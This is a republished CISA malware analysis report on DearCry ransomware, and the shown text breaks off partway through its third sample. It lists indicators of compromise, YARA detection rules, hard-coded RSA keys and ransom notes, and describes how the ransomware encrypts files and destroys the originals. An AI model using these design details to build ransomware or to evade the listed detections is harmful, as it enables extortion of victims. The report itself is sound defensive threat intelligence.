MAR-10330097-1.v1: DearCry Ransomware

by Scott Muniz | Apr 12, 2021 | Security, Technology

This article is contributed. See the original author and article here.

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

Six files were submitted for analysis. The files were identified as DearCry ransomware. The malware encrypts files on a device and demands ransom in exchange for decryption.

For a downloadable copy of IOCs, see: MAR-10330097-1.v1.stix.

Emails (2)

konedieyp[@]airmail.cc

uenwonken[@]memail.com

Submitted Files (6)

027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27 (027119161d11ba87acc908a1d284b9…)

10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da (10bce0ff6597f347c3cca8363b7c81…)

2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff (2b9838da7edb0decd32b086e47a31e…)

e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6 (e044d9f2d0f1260c3f4a543a1e67f3…)

fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65 (fdec933ca1dd1387d970eeea32ce5d…)

feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede (feb3e6d30ba573ba23f3bd1291ca17…)

Findings

2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff

Tags

downloaderloaderransomwaretrojan

Details

Name	2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff
Size	1322496 bytes
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	0e55ead3b8fd305d9a54f78c7b56741a
SHA1	f7b084e581a8dcea450c2652f8058d93797413c3
SHA256	2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff
SHA512	5c3d58d1001dce6f2d23f33861e9c7fef766b7fe0a86972e9f1eeb70bfad970b02561da6b6d193cf24bc3c1aaf2a42a950fa6e5dff36386653b8aa725c9abaaa
ssdeep	24576:LU5NX2yJOiUXmEICxu2WAP0NIzkQM+KpPRQ9StIUDpl1fpxkHVZgMCS+:L7XP7P9o5QzUtl1fpxkHVZgMC3
Entropy	6.994611

Antivirus

Ahnlab	Ransomware/Win.DoejoCrypt
Antiy	Trojan[Ransom]/Win32.DearCry
Avira	TR/FileCoder.HW
BitDefender	Trojan.GenericKD.36477740
ClamAV	Win.Ransomware.Dearcry-9840778-0
Comodo	Malware
Cyren	W32/Trojan.FOGJ-5046
ESET	a variant of Win32/Filecoder.DearCry.A trojan
Emsisoft	Trojan.GenericKD.36477740 (B)
Ikarus	Trojan-Ransom.FileCrypter
K7	Trojan ( 005790de1 )
Lavasoft	Trojan.GenericKD.36477740
McAfee	Ransom-DearCry!0E55EAD3B8FD
Microsoft Security Essentials	Ransom:Win32/DoejoCrypt.A
NANOAV	Trojan.Win32.Encoder.ipilfs
NetGate	Trojan.Win32.Malware
Quick Heal	Ransom.DearCry.S19261705
Sophos	Troj/Ransom-GFE
Symantec	Downloader
TACHYON	Ransom/W32.DearCry.1322496
TrendMicro	Ransom.56DC2A23
TrendMicro House Call	Ransom.56DC2A23
Vir.IT eXplorer	Ransom.Win32.DearCry.CUQ
VirusBlokAda	TrojanRansom.Encoder
Zillya!	Trojan.Encoder.Win32.2195

YARA Rules

rule CISA_10330097_01 : trojan downloader ransomware DEARCRY
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10330097”
       Date = “2021-03-31”
       Last_Modified = “20210331_1630”
       Actor = “n/a”
       Category = “Trojan Downloader Ransomware”
       Family = “DEARCRY”
       Description = “Detects DearCry Ransomware”
       MD5_1 = “0e55ead3b8fd305d9a54f78c7b56741a”
       SHA256_1 = “2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff”
       MD5_2 = “cdda3913408c4c46a6c575421485fa5b”
       SHA256_2 = “e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6”
       MD5_3 = “c6eeb14485d93f4e30fb79f3a57518fc”
       SHA256_3 = “feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede”
   strings:
       $s0 = { 8B 85 04 EA FF FF 50 8B 8D 08 EA FF FF 51 8B 55 14 52 8B 45 10 50 8D 8D 68 F0 FF FF 51 8B 95 00 EA FF FF 52 }
       $s1 = { 43 72 79 70 74 6F 50 72 6F 2D 58 63 68 42 }
       $s2 = “—–BEGIN RSA PUBLIC KEY—–“
       $s3 = “.CRYPT”
   condition:
       all of them
}

ssdeep Matches

99	feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede

PE Metadata

Compile Date	2021-03-09 03:08:39-05:00
Import Hash	f8b8e20e844ccd50a8eb73c2fca3626d

PE Sections

MD5	Name	Raw Size	Entropy
4289116f218aa083456871506085e1be	header	1024	2.596118
46c15879afc7b600a23284d8e72f87aa	.text	976896	7.069452
d0093b4c33543ebd59b2c22c7e71670f	.rdata	265728	6.128934
40f8722b3a267afab34d8909cf5da682	.data	25600	4.794047
a0bf446401bdd255b7f7cb0215177d73	.rsrc	512	5.108717
bcd8233433c686e481a6c5a4f1f263ac	.reloc	51712	5.474063

Packers/Compilers/Cryptors

Microsoft Visual C++ ?.?

Relationships

2b9838da7e…	Related_To	konedieyp[@]airmail.cc
2b9838da7e…	Related_To	uenwonken[@]memail.com

Description

This file is a 32-bit Windows executable application. This file has been identified as a variant of the DearCry Ransomware. The ransomware attempts to encrypt specific files, identified by file extension, on the target system utilizing the Advanced Encryption Standard (AES) and Rivest–Shamir–Adleman (RSA) encryption algorithms. The ransomware contains the following hard coded public RSA key, which is utilized to encrypt the target system’s user files.

–Begin RSA public key–
MIIBCAKCAQEAyLBClz9hsFGRf9fk3z0zmY2rz2J1qqGfV48DSjPV4lcwnhCi4/5+C6UsAhkdI4/5HwbfZBAiMySXNB3DxVB2hOrjDjIeVAkFjQgZ19B+KQFWkSo1ubeVdHjwdv74evEur9Lv9HM+89iZdzEpVPO+AjOTtsQgFNtmVecC2vmw9m60dgyR1CJQSg6Moblo2NVF50AK3cIG2lVh82ebgedXsbVJpjVMc03aTPWV4sNWjTO3o+aX6Z+VGVLjuvcpfLDZb3tYppkqZzAHfrCt7lV0qO47FV8sFCltuoNiNGKiP084KI7b3XEJepbSJB3UW4o4C4zHFrqmdyOoUlnqcQIBAw==-
–End RSA public key–

During runtime, the ransomware loads the hard-coded RSA public key. It then attempts to identify all drives that are connected to the attached system, from Drive A: to Drive Z:. For each drive identified, the ransomware will enumerate it and encrypt files with the following file extensions:

–Begin targeted file extensions–
.TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG .PL .PY .DWG .XML .JPG .BMP .PNG .EXE .DLL .CAD .AVI .H.CSV .DAT .ISO .PST .PGD .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA .GPG .EDB .MFS
–End targeted file extensions–

It will then write the ransom note “readme.txt” to every folder it enumerates on the connected drive.

–Begin ransom note–
Your file has been encrypted!
                        If you want to decrypt, please contact us.
                        konedieyp[@]airmail.cc or uenwonken[@]memail.com
                        And please send me the following hash!
                        638428e5021d4ae247b21acf9c0bf6f6
–End ransom note–

Next, the ransomware will attempt to encrypt files on the target system that have the file extensions listed above. After encrypting the target system’s user files the ransomware will drop the ransom note “readme.txt” within folders with encrypted files on the target system.

The ransomware will then delete the original copy of the files and then replace them with encrypted copies of themselves with the file extension changed to .CRYPT. Before actually deleting the original target file, the malware will overwrite it with the repeating value 0x41 in order to make recovery of the file using computer forensics software impossible.

Before encrypting the target system’s user files the malware will encrypt information about the files, including the file’s full path and the AES key used to encrypt it, which will also be used to decrypt it. This data will be encrypted using the hard coded Public RSA key mentioned above, and added to the top of the encrypted file. Note: The ransomware will generate a new AES key for every file.

During execution, the ransomware runs a service named “msupdate.” After the encryption process and installing the ransom note, the “msupdate” service is removed, which could indicate that the ransomware was executed under the Windows “msupdate” service.

Illustrated below are strings of interest extracted from this binary. These strings indicate the encryption process of the target system’s user files is implemented utilizing the OPENSSL library:

–Begin strings of interest–
cryptoevpe_aes.c
cryptobiobio_lib.c
cryptorsarsa_lib.c
cryptoevpevp_enc.c
assertion failed: bl <= (int)sizeof(ctx->buf)
assertion failed: b <= sizeof ctx->buf
assertion failed: b <= sizeof ctx->final
assertion failed: EVP_CIPHER_CTX_iv_length(ctx) <= (int)sizeof(ctx->iv)
assertion failed: ctx->cipher->block_size == 1 || ctx->cipher->block_size == 8 || ctx->cipher->block_size == 16
%lu:%s:%s:%d:%s
secure memory buffer
memory buffer
cryptobiobss_mem.c
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
PKCS7
CERTIFICATE
RSA PUBLIC KEY
DH PARAMETERS
X9.42 DH PARAMETERS
cryptorsarsa_crpt.c
cryptoevpevp_lib.c
assertion failed: l <= sizeof(c->iv)
assertion failed: j <= sizeof(c->iv)
init fail
called a function that was disabled at compile-time
internal error
passed a null parameter
called a function you should not call
malloc failure
fatal
missing asn1 eos
nested asn1 error
ECDSA lib
ENGINE lib
X509V3 lib
PKCS7 lib
BIO lib
EC lib
ASN1 lib
X509 lib
DSA lib
PEM lib
OBJ lib
BUF lib
EVP lib
DH lib
RSA lib
BN lib
system lib
gethostbyname
getsockname
getsockopt
setsockopt
getnameinfo
getaddrinfo
fread
opendir
WSAstartup
accept
listen
bind
ioctlsocket
socket
getservbyname
connect
fopen
KDF routines
ASYNC routines
CT routines
HMAC routines
CMS routines
FIPS routines
OCSP routines
engine routines
time stamp routines
DSO support routines
random number generator
PKCS12 routines
X509 V3 routines
PKCS7 routines
BIO routines
SSL routines
ECDH routines
ECDSA routines
elliptic curve routines
common libcrypto routines
configuration file routines
asn1 encoding routines
x509 certificate routines
dsa routines
PEM routines
object identifier routines
memory buffer routines
digital envelope routines
Diffie-Hellman routines
rsa routines
bignum routines
system library
unknown library
unknown
cryptoerrerr.c
error:%08lX:%s:%s:%s
reason(%lu)
func(%lu)
lib(%lu)
cryptomodesocb128.c
cryptothreads_win.c
cryptoex_data.c
OpenSSL PKCS#1 RSA (from Eric Young)
cryptorsarsa_ossl.c
cryptoengineeng_init.c
cryptobnbn_blind.c
cryptobnbn_lib.c
%I64i
OPENSSL_ia32cap
Service-0x
_OPENSSL_isservice
OpenSSL: FATAL
OpenSSL
no stack?
%s:%d: OpenSSL internal error: %s
cryptoenginetb_cipher.c
?assertion failed: *sbuffer != NULL
assertion failed: *currlen <= *maxlen
assertion failed: *sbuffer != NULL || buffer != NULL
cryptobiob_print.c
<NULL>
0123456789abcdef
0123456789ABCDEF
0123456789
A-C
?FILE pointer
cryptobiobss_file.c
fopen(‘
‘,’
cryptobufferbuffer.c
@@You need to read the OpenSSL FAQ, https://www.openssl.org/docs/faq.html
………………..
cryptorandmd_rand.c
cryptopempem_oth.c
X509_REQ
signature
sig_alg
req_info
X509_REQ_INFO
attributes
pubkey
subject
version
0123456789ABCDEF
Proc-Type:
ENCRYPTED
DEK-Info:
cryptopempem_lib.c
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
Proc-Type: 4,
BAD-TYPE
MIC-ONLY
MIC-CLEAR
ENCRYPTED
DEK-Info:
—–END
—–
—–BEGIN
CMS
PKCS #7 SIGNED DATA
TRUSTED CERTIFICATE
X509 CERTIFICATE
PARAMETERS
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
assertion failed: strlen(objstr) + 23 + 2 * EVP_CIPHER_iv_length(enc) + 13 <= sizeof buf
assertion failed: EVP_CIPHER_iv_length(enc) <= (int)sizeof(iv)
Expecting:
X509_CRL
crl
X509_CRL_INFO
revoked
nextUpdate
lastUpdate
issuer
X509_REVOKED
extensions
revocationDate
serialNumber
PKCS7_ATTR_VERIFY
PKCS7_ATTR_SIGN
PKCS7_ATTRIBUTES
PKCS7_DIGEST
digest
PKCS7_ENCRYPT
PKCS7_SIGN_ENVELOPE
PKCS7_ENC_CONTENT
algorithm
content_type
PKCS7_RECIP_INFO
enc_key
key_enc_algor
PKCS7_ENVELOPE
enc_data
recipientinfo
PKCS7_ISSUER_AND_SERIAL
serial
PKCS7_SIGNER_INFO
unauth_attr
enc_digest
digest_enc_alg
auth_attr
digest_alg
issuer_and_serial
PKCS7_SIGNED
signer_info
cert
contents
md_algs
type
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
d.other
NETSCAPE_CERT_SEQUENCE
certs
cryptoevpp_lib.c
%s algorithm “%s” unsupported
Public Key
cryptopempem_pkey.c
RSA_OAEP_PARAMS
pSourceFunc
maskGenFunc
hashFunc
RSA_PSS_PARAMS
trailerField
saltLength
maskGenAlgorithm
hashAlgorithm
RSA
X509_PUBKEY
public_key
algor
H/O
</O
h/O
P/O
0/O
cryptox509x_pubkey.c
cryptodsadsa_lib.c
DSA
priv_key
pub_key
DSA_SIG
cryptodsadsa_asn1.c
cryptoecec_key.c
assertion failed: eckey->group->meth->keygen != NULL
ECDSA_SIG
EC_PRIVATEKEY
publicKey
parameters
privateKey
ECPKPARAMETERS
value.implicitlyCA
value.parameters
value.named_curve
ECPARAMETERS
cofactor
order
base
curve
fieldID
X9_62_CURVE
seed
X9_62_FIELDID
fieldType
p.char_two
p.prime
X9_62_CHARACTERISTIC_TWO
p.ppBasis
p.tpBasis
p.onBasis
p.other
X9_62_PENTANOMIAL
certificate extensions
set-certExt
set-policy
set-attr
message extensions
set-msgExt
content types
set-ctype
Secure Electronic Transactions
id-set
pseudonym
generationQualifier
id-hex-multipart-message
id-hex-partial-message
mime-mhs-bodies
mime-mhs-headings
MIME MHS
mime-mhs
x500UniqueIdentifier
documentPublisher
audio
dITRedirect
personalSignature
subtreeMaximumQuality
subtreeMinimumQuality
singleLevelQuality
dSAQuality
buildingName
mailPreferenceOption
janetMailbox
organizationalStatus
friendlyCountryName
pagerTelephoneNumber
mobileTelephoneNumber
personalTitle
homePostalAddress
associatedName
associatedDomain
cNAMERecord
sOARecord
nSRecord
mXRecord
pilotAttributeType27
aRecord
lastModifiedBy
lastModifiedTime
otherMailbox
secretary
homeTelephoneNumber
documentLocation
documentAuthor
documentVersion
documentTitle
documentIdentifier
manager
host
userClass
photo
roomNumber
favouriteDrink
info
rfc822Mailbox
mail
textEncodedORAddress
userId
UID
qualityLabelledData
pilotDSA
pilotOrganization
simpleSecurityObject
friendlyCountry
domainRelatedObject
dNSDomain
rFC822localPart
documentSeries
room
document
account
pilotPerson
pilotObject
caseIgnoreIA5StringSyntax
iA5StringSyntax
pilotGroups
pilotObjectClass
pilotAttributeSyntax
pilotAttributeType
pilot
ucl
pss
data
Hold Instruction Reject
holdInstructionReject
Hold Instruction Call Issuer
holdInstructionCallIssuer
Hold Instruction None
holdInstructionNone
Hold Instruction Code
holdInstructionCode
aes-256-cfb
AES-256-CFB
aes-256-ofb
AES-256-OFB
aes-256-cbc
AES-256-CBC
aes-256-ecb
AES-256-ECB
aes-192-cfb
AES-192-CFB
aes-192-ofb
AES-192-OFB
aes-192-cbc
AES-192-CBC
aes-192-ecb
AES-192-ECB
aes-128-cfb
AES-128-CFB
aes-128-ofb
AES-128-OFB
aes-128-cbc
AES-128-CBC
aes-128-ecb
AES-128-ECB
Microsoft CSP Name
CSPName
ecdsa-with-SHA1
prime256v1
prime239v3
prime239v2
prime239v1
prime192v3
prime192v2
prime192v1
id-ecPublicKey
characteristic-two-field
prime-field
ANSI X9.62
ansi-X9-62
X509v3 No Revocation Available
noRevAvail
X509v3 AC Targeting
targetInformation
X509v3 Policy Constraints
policyConstraints
role
id-aca-encAttrs
Subject Information Access
subjectInfoAccess
ac-proxying
md4WithRSAEncryption
RSA-MD4
clearance
Selected Attribute Types
selected-attribute-types
Domain
domain
domainComponent
dcObject
dcobject
Enterprises
enterprises
Mail
SNMPv2
snmpv2
Security
security
Private
private
Experimental
experimental
Management
mgmt
Directory
directory
iana
IANA
dod
DOD
org
ORG
directory services – algorithms
X500algorithms
rsaSignature
Trust Root
trustRoot
path
valid
Extended OCSP Status
extendedStatus
OCSP Service Locator
serviceLocator
OCSP Archive Cutoff
archiveCutoff
OCSP No Check
noCheck
Acceptable OCSP Responses
acceptableResponses
OCSP CRL ID
CrlID
OCSP Nonce
Nonce
Basic OCSP Response
basicOCSPResponse
ad dvcs
AD_DVCS
AD Time Stamping
ad_timestamping
id-cct-PKIResponse
id-cct-PKIData
id-cct-crs
id-qcs-pkixQCSyntax-v1
id-aca-role
id-aca-group
id-aca-chargingIdentity
id-aca-accessIdentity
id-aca-authenticationInfo
id-pda-countryOfResidence
id-pda-countryOfCitizenship
id-pda-gender
id-pda-placeOfBirth
id-pda-dateOfBirth
id-on-personalData
id-cmc-confirmCertAcceptance
id-cmc-popLinkWitness
id-cmc-popLinkRandom
id-cmc-queryPending
id-cmc-responseInfo
id-cmc-regInfo
id-cmc-revokeRequest
cryptoasn1tasn_enc.c
cryptoasn1tasn_new.c
cryptoasn1tasn_fre.c
cryptoasn1a_dup.c
assertion failed: niv <= EVP_MAX_IV_LENGTH
assertion failed: nkey <= EVP_MAX_KEY_LENGTH
cryptoevpevp_key.c
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
?456789:;<=
!”#$%&'()*+,-./0123
cryptoevpencode.c
assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)
assertion failed: n < (int)sizeof(ctx->enc_data)
cryptoasn1ameth_lib.c
X509_EXTENSIONS
Extension
X509_EXTENSION
critical
–End strings of interest–

Screenshots

Figure 1 - Screenshot of the data that will be prepended to an encrypted file. This data will contain an AES key that can be used to decrypt the file, as well as the full path of the file. This block will be encrypted via the hard-coded RSA key before it is prepended to the newly encrypted files. The ransomware will generate a new AES key for each file it encrypts.

Figure 1 – Screenshot of the data that will be prepended to an encrypted file. This data will contain an AES key that can be used to decrypt the file, as well as the full path of the file. This block will be encrypted via the hard-coded RSA key before it is prepended to the newly encrypted files. The ransomware will generate a new AES key for each file it encrypts.

Figure 2 - Screenshot of data after it is encrypted using the malware's hard-coded RSA key.

Figure 2 – Screenshot of data after it is encrypted using the malware’s hard-coded RSA key.

Figure 3 - Screenshot of the header of an encrypted file after the encrypted AES key and the full path of the file data is appended.

Figure 3 – Screenshot of the header of an encrypted file after the encrypted AES key and the full path of the file data is appended.

Figure 4 - The ransomware enumerating all drives attached to the target system.

Figure 4 – The ransomware enumerating all drives attached to the target system.

Figure 5 - The ransomware writing the ransom note "readme.txt" to a directory after it encrypts contents of a directory.

Figure 5 – The ransomware writing the ransom note “readme.txt” to a directory after it encrypts contents of a directory.

Figure 6 - The ransomware deleting the "msupdate" service after encryption of the target system's files complete.

Figure 6 – The ransomware deleting the “msupdate” service after encryption of the target system’s files complete.

konedieyp[@]airmail.cc

Tags

ransomware

Details

Address	konedieyp[@]airmail.cc

Relationships

konedieyp[@]airmail.cc	Related_To	2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff
konedieyp[@]airmail.cc	Related_To	fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65
konedieyp[@]airmail.cc	Related_To	027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27
konedieyp[@]airmail.cc	Related_To	e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6
konedieyp[@]airmail.cc	Related_To	feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede
konedieyp[@]airmail.cc	Related_To	10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da

Description

The DearCry ransomware samples contain this email address in the ransom note as a contact for decrypting files.

uenwonken[@]memail.com

Tags

ransomware

Details

Address	uenwonken[@]memail.com

Relationships

uenwonken[@]memail.com	Related_To	2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff
uenwonken[@]memail.com	Related_To	fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65
uenwonken[@]memail.com	Related_To	027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27
uenwonken[@]memail.com	Related_To	e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6
uenwonken[@]memail.com	Related_To	feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede
uenwonken[@]memail.com	Related_To	10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da

Description

The DearCry ransomware samples contain this email address in the ransom note as a contact for decrypting files.

fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65

Tags

ransomwaretrojan

Details

Name	fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65
Size	1322521 bytes
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	6be28a4523984698e7154671f73361bf
SHA1	b974375ef0f6dcb6ce30558df2ed8570bf1ad642
SHA256	fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65
SHA512	c3a44431e8cbb76d75ea2a1caca6fe77dfbd2a9565da918620433d415d396c08394ecb1c6454fc69661d61683711e53b60a69435e25518a04e81c20136f62f20
ssdeep	24576:C5Nv2SkWFP/529IC8u2bAs0NIzkQS+KpPbEasBY2iKDl1fpxkLVZgMCST:oB70s9yjE62iIl1fpxkLVZgMCA
Entropy	6.994288

Antivirus

Ahnlab	Ransomware/Win.DoejoCrypt
Antiy	Trojan[Ransom]/Win32.Encoder
Avira	TR/AD.DearcryRansom.dneew
BitDefender	Gen:Heur.Mint.Zard.46
ClamAV	Win.Ransomware.Dearcry-9840778-0
Comodo	Malware
Cyren	W32/Ransom.TNVJ-5084
ESET	a variant of Win32/Filecoder.DearCry.A trojan
Emsisoft	Gen:Heur.Mint.Zard.46 (B)
Ikarus	Trojan-Ransom.FileCrypter
K7	Trojan ( 005790ee1 )
Lavasoft	Gen:Heur.Mint.Zard.46
McAfee	Ransom-DearCry!6BE28A452398
Microsoft Security Essentials	Ransom:Win32/DoejoCrypt.A
NANOAV	Trojan.Win32.Encoder.ioxcpd
Quick Heal	Ransom.DearCry.S19261705
Sophos	Troj/Ransom-GFE
Symantec	Ransom.Dearcry
Systweak	trojan-ransom.dearcry
TACHYON	Ransom/W32.DearCry.1322521
TrendMicro	Ransom.53933CA6
TrendMicro House Call	Ransom.53933CA6
Vir.IT eXplorer	Ransom.Win32.DearCry.CUQ
VirusBlokAda	TrojanRansom.Encoder
Zillya!	Trojan.Filecoder.Win32.18026

YARA Rules

rule CISA_10330097_01 : trojan downloader ransomware DEARCRY
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10330097”
       Date = “2021-03-31”
       Last_Modified = “20210331_1630”
       Actor = “n/a”
       Category = “Trojan Downloader Ransomware”
       Family = “DEARCRY”
       Description = “Detects DearCry Ransomware”
       MD5_1 = “0e55ead3b8fd305d9a54f78c7b56741a”
       SHA256_1 = “2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff”
       MD5_2 = “cdda3913408c4c46a6c575421485fa5b”
       SHA256_2 = “e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6”
       MD5_3 = “c6eeb14485d93f4e30fb79f3a57518fc”
       SHA256_3 = “feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede”
   strings:
       $s0 = { 8B 85 04 EA FF FF 50 8B 8D 08 EA FF FF 51 8B 55 14 52 8B 45 10 50 8D 8D 68 F0 FF FF 51 8B 95 00 EA FF FF 52 }
       $s1 = { 43 72 79 70 74 6F 50 72 6F 2D 58 63 68 42 }
       $s2 = “—–BEGIN RSA PUBLIC KEY—–“
       $s3 = “.CRYPT”
   condition:
       all of them
}

ssdeep Matches

No matches found.

PE Metadata

Compile Date	2021-03-08 01:29:05-05:00
Import Hash	f8b8e20e844ccd50a8eb73c2fca3626d

PE Sections

MD5	Name	Raw Size	Entropy
19c89970662b40d47561bb17377abe08	header	1024	2.591397
07abe3c7ee0a03e132be7d8e50cb59b3	.text	976896	7.069141
7133c887704081b6d3678f691a6754fe	.rdata	265728	6.128972
bef1589c6181fa392609e904f4410443	.data	26112	4.707707
a0bf446401bdd255b7f7cb0215177d73	.rsrc	512	5.108717
f3d5e7499f330d470ed5e0dd856b599c	.reloc	51712	5.474130

Packers/Compilers/Cryptors

Microsoft Visual C++ ?.?

Relationships

fdec933ca1…	Related_To	konedieyp[@]airmail.cc
fdec933ca1…	Related_To	uenwonken[@]memail.com

Description

This file is a malicious 32-bit Windows executable. It has been identified as a variant of the DearCry ransomware and is similar in design and functionality to the file 2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff. The hard-coded RSA key contained within this binary is illustrated below.

–Begin RSA public key–
MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPDwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1IzkqXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJUQ57w3jZpOnpFXSZoUy1YD7Y3Cu+n/Q6cEft6t29/FQgacXmeA2ajb7ssSbSntBpTpoyGc/kKoaihYPrHtNRhkMcZQayy5aXTgYtEjhzJAC+esXiTYqklWMXJS1EmUpoQIBAw==
–End RSA public key–

This ransomware provides the following ransom note within directories of encrypted files on the target system and shared drives:

–Begin ransom note–
Your file has been encrypted!
                        If you want to decrypt, please contact us.
                        konedieyp[@]airmail.cc or uenwonken[@]memail.com
                        And please send me the following hash!
                        d37fc1eabc6783a418d23a8d2ba5db5a
–End ransom note–

027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27

Tags

ransomwaretrojan

Details

Name	027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27
Size	1322496 bytes
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	a7e571312e05d547936aab18f0b30fbf
SHA1	e0d643e759b2adf736b451aff9afa92811ab8a99
SHA256	027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27
SHA512	20e8af2770aa1be935f7d1b74d6db6f9aeb5aebab016ac6c2e58e60b1b5c9029726fda7b75ed003bf4a1a5a480024231c6a90f5a3d812bf2438dc2c540a49f88
ssdeep	24576:C5Nv2SkWFP/529IC8u2bAs0NIzkQS+KpPbEasBY2iKDl1fpxkLVZgMCSZ:oB70s9yjE62iIl1fpxkLVZgMCk
Entropy	6.994270

Antivirus

Ahnlab	Ransomware/Win.DoejoCrypt
Avira	TR/AD.DearcryRansom.dneew
BitDefender	Gen:Heur.Mint.Zard.46
ClamAV	Win.Ransomware.Dearcry-9840778-0
Comodo	Malware
Cyren	W32/Trojan.UHTA-2594
ESET	a variant of Win32/Filecoder.DearCry.A trojan
Emsisoft	Gen:Heur.Mint.Zard.46 (B)
Ikarus	Trojan-Ransom.FileCrypter
K7	Trojan ( 005790ee1 )
Lavasoft	Gen:Heur.Mint.Zard.46
McAfee	Ransom-DearCry!A7E571312E05
Microsoft Security Essentials	Ransom:Win32/DoejoCrypt.A
NANOAV	Trojan.Win32.Encoder.ioxcpd
Quick Heal	Ransom.DearCry.S19261705
Sophos	Troj/Ransom-GFE
Symantec	Unavailable (production)
Systweak	trojan-ransom.dearcry
TACHYON	Ransom/W32.DearCry.1322496
TrendMicro	Ransom.FC206072
TrendMicro House Call	Ransom.FC206072
Vir.IT eXplorer	Ransom.Win32.DearCry.CUQ
VirusBlokAda	TrojanRansom.Encoder
Zillya!	Trojan.Filecoder.Win32.18026

YARA Rules

rule CISA_10330097_01 : trojan downloader ransomware DEARCRY
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10330097”
       Date = “2021-03-31”
       Last_Modified = “20210331_1630”
       Actor = “n/a”
       Category = “Trojan Downloader Ransomware”
       Family = “DEARCRY”
       Description = “Detects DearCry Ransomware”
       MD5_1 = “0e55ead3b8fd305d9a54f78c7b56741a”
       SHA256_1 = “2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff”
       MD5_2 = “cdda3913408c4c46a6c575421485fa5b”
       SHA256_2 = “e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6”
       MD5_3 = “c6eeb14485d93f4e30fb79f3a57518fc”
       SHA256_3 = “feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede”
   strings:
       $s0 = { 8B 85 04 EA FF FF 50 8B 8D 08 EA FF FF 51 8B 55 14 52 8B 45 10 50 8D 8D 68 F0 FF FF 51 8B 95 00 EA FF FF 52 }
       $s1 = { 43 72 79 70 74 6F 50 72 6F 2D 58 63 68 42 }
